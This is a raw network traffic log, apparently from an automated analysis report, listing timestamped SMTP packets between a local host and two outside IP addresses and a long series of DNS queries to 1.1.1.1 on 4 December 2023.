                                                                                                                                                                                                          Dec 4, 2023 13:00:24.136010885 CET254977117.57.154.33192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 13:00:24.136115074 CET4977125192.168.2.417.57.154.33
                                                                                                                                                                                                          Dec 4, 2023 13:00:24.238989115 CET2549770142.251.167.26192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 13:00:24.239170074 CET4977025192.168.2.4142.251.167.26
                                                                                                                                                                                                          Dec 4, 2023 13:00:24.327014923 CET254977117.57.154.33192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 13:00:24.367701054 CET2549770142.251.167.26192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 13:00:24.374867916 CET2549770142.251.167.26192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 13:00:24.375247955 CET4977025192.168.2.4142.251.167.26
                                                                                                                                                                                                          Dec 4, 2023 13:00:24.382080078 CET4977025192.168.2.4142.251.167.26
                                                                                                                                                                                                          Dec 4, 2023 13:00:24.386562109 CET4977025192.168.2.4142.251.167.26
                                                                                                                                                                                                          Dec 4, 2023 13:00:24.391566992 CET4977025192.168.2.4142.251.167.26
                                                                                                                                                                                                          Dec 4, 2023 13:00:24.396081924 CET4977025192.168.2.4142.251.167.26
                                                                                                                                                                                                          Dec 4, 2023 13:00:24.400863886 CET4977025192.168.2.4142.251.167.26
                                                                                                                                                                                                          Dec 4, 2023 13:00:24.405488968 CET4977025192.168.2.4142.251.167.26
                                                                                                                                                                                                          Dec 4, 2023 13:00:24.410517931 CET4977025192.168.2.4142.251.167.26
                                                                                                                                                                                                          Dec 4, 2023 13:00:24.415091991 CET4977025192.168.2.4142.251.167.26
                                                                                                                                                                                                          Dec 4, 2023 13:00:24.419776917 CET4977025192.168.2.4142.251.167.26
                                                                                                                                                                                                          Dec 4, 2023 13:00:24.424782038 CET4977025192.168.2.4142.251.167.26
                                                                                                                                                                                                          Dec 4, 2023 13:00:24.510144949 CET2549770142.251.167.26192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 13:00:24.510267019 CET4977025192.168.2.4142.251.167.26
                                                                                                                                                                                                          Dec 4, 2023 13:00:24.512530088 CET2549770142.251.167.26192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 13:00:24.513727903 CET4977025192.168.2.4142.251.167.26
                                                                                                                                                                                                          Dec 4, 2023 13:00:24.516216993 CET2549770142.251.167.26192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 13:00:24.517632008 CET4977025192.168.2.4142.251.167.26
                                                                                                                                                                                                          Dec 4, 2023 13:00:24.520430088 CET2549770142.251.167.26192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 13:00:24.521790981 CET4977025192.168.2.4142.251.167.26
                                                                                                                                                                                                          Dec 4, 2023 13:00:24.525423050 CET2549770142.251.167.26192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 13:00:24.526861906 CET4977025192.168.2.4142.251.167.26
                                                                                                                                                                                                          Dec 4, 2023 13:00:24.529802084 CET2549770142.251.167.26192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 13:00:24.531076908 CET4977025192.168.2.4142.251.167.26
                                                                                                                                                                                                          Dec 4, 2023 13:00:24.534337044 CET2549770142.251.167.26192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 13:00:24.535818100 CET4977025192.168.2.4142.251.167.26
                                                                                                                                                                                                          Dec 4, 2023 13:00:24.538814068 CET2549770142.251.167.26192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 13:00:24.540242910 CET4977025192.168.2.4142.251.167.26
                                                                                                                                                                                                          Dec 4, 2023 13:00:24.543524981 CET2549770142.251.167.26192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 13:00:24.544929981 CET4977025192.168.2.4142.251.167.26
                                                                                                                                                                                                          Dec 4, 2023 13:00:24.547986031 CET2549770142.251.167.26192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 13:00:24.549169064 CET4977025192.168.2.4142.251.167.26
                                                                                                                                                                                                          Dec 4, 2023 13:00:24.553098917 CET2549770142.251.167.26192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 13:00:24.638190031 CET2549770142.251.167.26192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 13:00:24.643718004 CET2549770142.251.167.26192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 13:00:24.643755913 CET2549770142.251.167.26192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 13:00:24.647066116 CET2549770142.251.167.26192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 13:00:24.647099972 CET2549770142.251.167.26192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 13:00:24.649499893 CET254977117.57.154.33192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 13:00:24.649540901 CET254977117.57.154.33192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 13:00:24.649586916 CET4977125192.168.2.417.57.154.33
                                                                                                                                                                                                          Dec 4, 2023 13:00:24.650015116 CET4977125192.168.2.417.57.154.33
                                                                                                                                                                                                          Dec 4, 2023 13:00:24.651602030 CET2549770142.251.167.26192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 13:00:24.651722908 CET2549770142.251.167.26192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 13:00:24.656213045 CET2549770142.251.167.26192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 13:00:24.656232119 CET2549770142.251.167.26192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 13:00:24.660986900 CET2549770142.251.167.26192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 13:00:24.661118984 CET2549770142.251.167.26192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 13:00:24.665249109 CET2549770142.251.167.26192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 13:00:24.665388107 CET2549770142.251.167.26192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 13:00:24.670494080 CET2549770142.251.167.26192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 13:00:24.670546055 CET2549770142.251.167.26192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 13:00:24.672404051 CET2549770142.251.167.26192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 13:00:24.672485113 CET2549770142.251.167.26192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 13:00:24.677133083 CET2549770142.251.167.26192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 13:00:24.677150965 CET2549770142.251.167.26192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 13:00:24.726624012 CET2549770142.251.167.26192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 13:00:24.726661921 CET2549770142.251.167.26192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 13:00:24.726731062 CET4977025192.168.2.4142.251.167.26
                                                                                                                                                                                                          Dec 4, 2023 13:00:24.728065968 CET4977025192.168.2.4142.251.167.26
                                                                                                                                                                                                          Dec 4, 2023 13:00:24.850956917 CET2549770142.251.167.26192.168.2.4
                                                                                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                          Dec 4, 2023 12:56:38.617208004 CET5103853192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 4, 2023 12:56:38.712129116 CET53510381.1.1.1192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:56:38.733052015 CET5482853192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 4, 2023 12:56:38.828021049 CET53548281.1.1.1192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:56:45.199285984 CET5482953192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 4, 2023 12:56:45.296446085 CET53548291.1.1.1192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:56:45.310018063 CET5483053192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 4, 2023 12:56:45.349865913 CET5483153192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 4, 2023 12:56:45.406470060 CET53548301.1.1.1192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:56:45.438976049 CET5483253192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 4, 2023 12:56:45.447907925 CET53548311.1.1.1192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:56:45.474900007 CET5483353192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 4, 2023 12:56:45.532509089 CET5483453192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 4, 2023 12:56:45.536264896 CET53548321.1.1.1192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:56:45.572977066 CET53548331.1.1.1192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:56:45.583698034 CET5483553192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 4, 2023 12:56:45.629677057 CET53548341.1.1.1192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:56:45.646394968 CET5483653192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 4, 2023 12:56:45.680444956 CET53548351.1.1.1192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:56:45.721318960 CET5483753192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 4, 2023 12:56:45.744317055 CET53548361.1.1.1192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:56:45.792948008 CET5483853192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 4, 2023 12:56:45.819017887 CET53548371.1.1.1192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:56:45.855591059 CET5483953192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 4, 2023 12:56:45.891000032 CET53548381.1.1.1192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:56:45.917095900 CET5484053192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 4, 2023 12:56:45.954781055 CET53548391.1.1.1192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:56:45.992125988 CET5484153192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 4, 2023 12:56:46.014142990 CET53548401.1.1.1192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:56:46.060656071 CET5484253192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 4, 2023 12:56:46.089236975 CET53548411.1.1.1192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:56:46.116363049 CET5484353192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 4, 2023 12:56:46.157896042 CET53548421.1.1.1192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:56:46.162630081 CET5484453192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 4, 2023 12:56:46.217000008 CET53548431.1.1.1192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:56:46.233717918 CET5484553192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 4, 2023 12:56:46.260643005 CET53548441.1.1.1192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:56:46.298243046 CET5484653192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 4, 2023 12:56:46.330054045 CET53548451.1.1.1192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:56:46.356503010 CET5484753192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 4, 2023 12:56:46.395101070 CET53548461.1.1.1192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:56:46.416532993 CET5484853192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 4, 2023 12:56:46.451685905 CET53548471.1.1.1192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:56:46.512583017 CET5484953192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 4, 2023 12:56:46.513133049 CET53548481.1.1.1192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:56:46.551721096 CET5485053192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 4, 2023 12:56:46.599066019 CET5485153192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 4, 2023 12:56:46.608899117 CET53548491.1.1.1192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:56:46.648612022 CET53548501.1.1.1192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:56:46.666831970 CET5485253192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 4, 2023 12:56:46.694787025 CET53548511.1.1.1192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:56:46.726443052 CET5485353192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 4, 2023 12:56:46.763109922 CET53548521.1.1.1192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:56:46.784470081 CET5485453192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 4, 2023 12:56:46.822603941 CET53548531.1.1.1192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:56:46.845383883 CET5485553192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 4, 2023 12:56:46.884673119 CET53548541.1.1.1192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:56:46.916975975 CET5485653192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 4, 2023 12:56:46.942701101 CET53548551.1.1.1192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:56:46.973804951 CET5485753192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 4, 2023 12:56:47.015193939 CET53548561.1.1.1192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:56:47.023700953 CET5485853192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 4, 2023 12:56:47.069314003 CET53548571.1.1.1192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:56:47.086271048 CET5485953192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 4, 2023 12:56:47.119302988 CET53548581.1.1.1192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:56:47.148869038 CET5486053192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 4, 2023 12:56:47.182794094 CET53548591.1.1.1192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:56:47.223227978 CET5486153192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 4, 2023 12:56:47.247742891 CET53548601.1.1.1192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:56:47.278407097 CET5486253192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 4, 2023 12:56:47.319988012 CET53548611.1.1.1192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:56:47.341114044 CET5486353192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 4, 2023 12:56:47.377485037 CET53548621.1.1.1192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:56:47.404840946 CET5486453192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 4, 2023 12:56:47.439150095 CET53548631.1.1.1192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:56:47.480418921 CET5486553192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 4, 2023 12:56:47.501830101 CET53548641.1.1.1192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:56:47.527740002 CET5486653192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 4, 2023 12:56:47.577759027 CET53548651.1.1.1192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:56:47.624058962 CET53548661.1.1.1192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:57:08.834614038 CET5241153192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 4, 2023 12:57:08.905287027 CET5241253192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 4, 2023 12:57:08.935079098 CET53524111.1.1.1192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:57:08.944775105 CET5114153192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 4, 2023 12:57:08.960414886 CET5114253192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 4, 2023 12:57:09.000550032 CET53524121.1.1.1192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:57:09.043661118 CET5114353192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 4, 2023 12:57:09.044761896 CET53511411.1.1.1192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:57:09.055695057 CET53511421.1.1.1192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:57:09.139024019 CET53511431.1.1.1192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:57:36.603219032 CET5869053192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 4, 2023 12:57:36.697988987 CET53586901.1.1.1192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:58:03.465971947 CET5869253192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 4, 2023 12:58:03.510313988 CET5948353192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 4, 2023 12:58:03.569813967 CET53586921.1.1.1192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:58:03.584434032 CET5935053192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 4, 2023 12:58:03.607568026 CET53594831.1.1.1192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:58:03.622838974 CET5935153192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 4, 2023 12:58:03.622878075 CET6158053192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 4, 2023 12:58:03.688302040 CET53593501.1.1.1192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:58:03.718607903 CET53615801.1.1.1192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:58:03.728634119 CET53593511.1.1.1192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:58:03.740166903 CET5846353192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 4, 2023 12:58:03.912859917 CET53584631.1.1.1192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:58:03.924747944 CET5846453192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 4, 2023 12:58:04.206684113 CET53584641.1.1.1192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:58:04.207446098 CET5588653192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 4, 2023 12:58:04.712810993 CET53558861.1.1.1192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:58:07.119013071 CET5588753192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 4, 2023 12:58:07.178853035 CET5588853192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 4, 2023 12:58:07.283826113 CET5588953192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 4, 2023 12:58:07.291105032 CET53558881.1.1.1192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:58:07.302264929 CET53558871.1.1.1192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:58:07.302917957 CET6083553192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 4, 2023 12:58:07.305835009 CET6083653192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 4, 2023 12:58:07.482788086 CET53608351.1.1.1192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:58:07.492816925 CET53558891.1.1.1192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:58:07.494678974 CET6140353192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 4, 2023 12:58:07.657799959 CET53614031.1.1.1192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:58:07.985611916 CET53608361.1.1.1192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:58:10.882945061 CET6140453192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 4, 2023 12:58:10.979995012 CET53614041.1.1.1192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:58:10.988212109 CET6334153192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 4, 2023 12:58:11.090390921 CET53633411.1.1.1192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:59:06.709422112 CET6334253192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 4, 2023 12:59:06.712753057 CET6334353192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 4, 2023 12:59:06.773587942 CET6334453192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 4, 2023 12:59:06.810046911 CET53633431.1.1.1192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:59:06.810802937 CET5010753192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 4, 2023 12:59:06.824368954 CET53633421.1.1.1192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:59:06.825021982 CET6318353192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 4, 2023 12:59:06.837090015 CET6318453192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 4, 2023 12:59:06.883122921 CET53633441.1.1.1192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:59:06.886151075 CET5767853192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 4, 2023 12:59:06.921446085 CET53631831.1.1.1192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:59:06.961072922 CET53631841.1.1.1192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:59:06.991183043 CET53501071.1.1.1192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:59:06.996057987 CET53576781.1.1.1192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:59:10.670665979 CET5767953192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 4, 2023 12:59:10.772983074 CET53576791.1.1.1192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:59:10.785085917 CET5815753192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 4, 2023 12:59:10.881917953 CET53581571.1.1.1192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:59:47.148745060 CET5815853192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 4, 2023 12:59:47.210634947 CET5815953192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 4, 2023 12:59:47.243912935 CET53581581.1.1.1192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:59:47.271567106 CET5260053192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 4, 2023 12:59:47.280262947 CET5260153192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 4, 2023 12:59:47.307240963 CET53581591.1.1.1192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:59:47.337029934 CET5260253192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 4, 2023 12:59:47.368109941 CET53526001.1.1.1192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:59:47.375308037 CET53526011.1.1.1192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:59:47.376770973 CET6104153192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 4, 2023 12:59:47.434587002 CET53526021.1.1.1192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:59:47.472886086 CET53610411.1.1.1192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:59:48.297982931 CET6104253192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 4, 2023 12:59:48.393649101 CET53610421.1.1.1192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:59:51.547020912 CET6104353192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 4, 2023 12:59:51.644685030 CET53610431.1.1.1192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:59:51.731152058 CET6104453192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 4, 2023 12:59:51.801286936 CET6104553192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 4, 2023 12:59:51.843180895 CET53610441.1.1.1192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:59:51.898251057 CET53610451.1.1.1192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:59:55.857830048 CET6104653192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 4, 2023 12:59:55.917257071 CET6104753192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 4, 2023 12:59:55.954401016 CET53610461.1.1.1192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:59:55.988451004 CET6104853192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 4, 2023 12:59:56.012269974 CET53610471.1.1.1192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:59:56.042936087 CET6104953192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 4, 2023 12:59:56.085059881 CET53610481.1.1.1192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:59:56.162161112 CET53610491.1.1.1192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:59:56.890754938 CET6105053192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 4, 2023 12:59:56.989005089 CET53610501.1.1.1192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:59:57.073013067 CET6105153192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 4, 2023 12:59:57.169759035 CET53610511.1.1.1192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:59:57.193279028 CET6105253192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 4, 2023 12:59:57.291544914 CET53610521.1.1.1192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:59:57.361696005 CET6105353192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 4, 2023 12:59:57.458709002 CET53610531.1.1.1192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:59:57.512841940 CET6105453192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 4, 2023 12:59:57.629976988 CET53610541.1.1.1192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:59:57.700805902 CET6105553192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 4, 2023 12:59:57.798849106 CET53610551.1.1.1192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:59:57.957540035 CET6105653192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 4, 2023 12:59:58.055202007 CET53610561.1.1.1192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:59:58.146372080 CET6105753192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 4, 2023 12:59:58.243330002 CET53610571.1.1.1192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:59:58.311306953 CET6105853192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 4, 2023 12:59:58.408608913 CET53610581.1.1.1192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:59:58.497687101 CET6105953192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 4, 2023 12:59:58.595101118 CET53610591.1.1.1192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:59:58.678091049 CET6106053192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 4, 2023 12:59:58.775779963 CET53610601.1.1.1192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:59:58.832895994 CET6106153192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 4, 2023 12:59:58.929356098 CET53610611.1.1.1192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:59:58.986820936 CET6106253192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 4, 2023 12:59:59.086363077 CET53610621.1.1.1192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:59:59.120625973 CET6106353192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 4, 2023 12:59:59.217323065 CET53610631.1.1.1192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:59:59.291026115 CET6106453192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 4, 2023 12:59:59.387880087 CET53610641.1.1.1192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:59:59.433757067 CET6106553192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 4, 2023 12:59:59.490381956 CET6106653192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 4, 2023 12:59:59.530201912 CET53610651.1.1.1192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:59:59.580461025 CET6106753192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 4, 2023 12:59:59.587235928 CET53610661.1.1.1192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:59:59.616143942 CET6106853192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 4, 2023 12:59:59.676064968 CET53610671.1.1.1192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:59:59.682137012 CET6106953192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 4, 2023 12:59:59.712975979 CET53610681.1.1.1192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:59:59.744831085 CET6107053192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 4, 2023 12:59:59.780025959 CET53610691.1.1.1192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:59:59.805339098 CET6107153192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 4, 2023 12:59:59.842062950 CET53610701.1.1.1192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:59:59.865484953 CET6107253192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 4, 2023 12:59:59.903774023 CET53610711.1.1.1192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:59:59.932988882 CET6107353192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 4, 2023 12:59:59.962491989 CET53610721.1.1.1192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 13:00:00.029608965 CET53610731.1.1.1192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 13:00:00.056797028 CET6107453192.168.2.41.1.1.1
